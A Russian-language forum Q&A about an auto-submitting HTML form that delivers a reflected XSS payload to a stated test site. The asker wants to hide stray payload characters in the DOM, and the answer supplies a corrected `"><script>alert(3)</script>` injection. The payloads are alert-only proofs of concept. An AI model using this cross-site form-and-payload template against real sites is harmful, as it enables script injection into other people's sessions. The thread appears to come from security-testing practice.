Question

Я создал html-страницу, которая перенаправляет пользователя на тестовый сайт с XSS-уязвимостью. Я могу успешно выполнить JavaScript с помощью уязвимости. Однако я обнаружил, что некоторые символы, которые я использую для атаки XSS, отображаются в DOM. Как я могу скрыть эти символы от показа в DOM?

<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input 
        type="hidden"
        name="login"
        value='"><script>alert(document.location)</script>'
      </input>
    </form>
  </body>

Prakash Software · Answer 1 · 12 апреля 2019

Ошибка опечатки value='" и удалить последнюю ' />

<form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value="" /><script>alert(3)</script>
    </form>

<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value=""><script>alert(3)</script>
    </form>
  </body>

XSS: отображение персонажа в DOM

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

1 Ответ

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

XSS: отображение персонажа в DOM

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

1 Ответ

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Похожие темы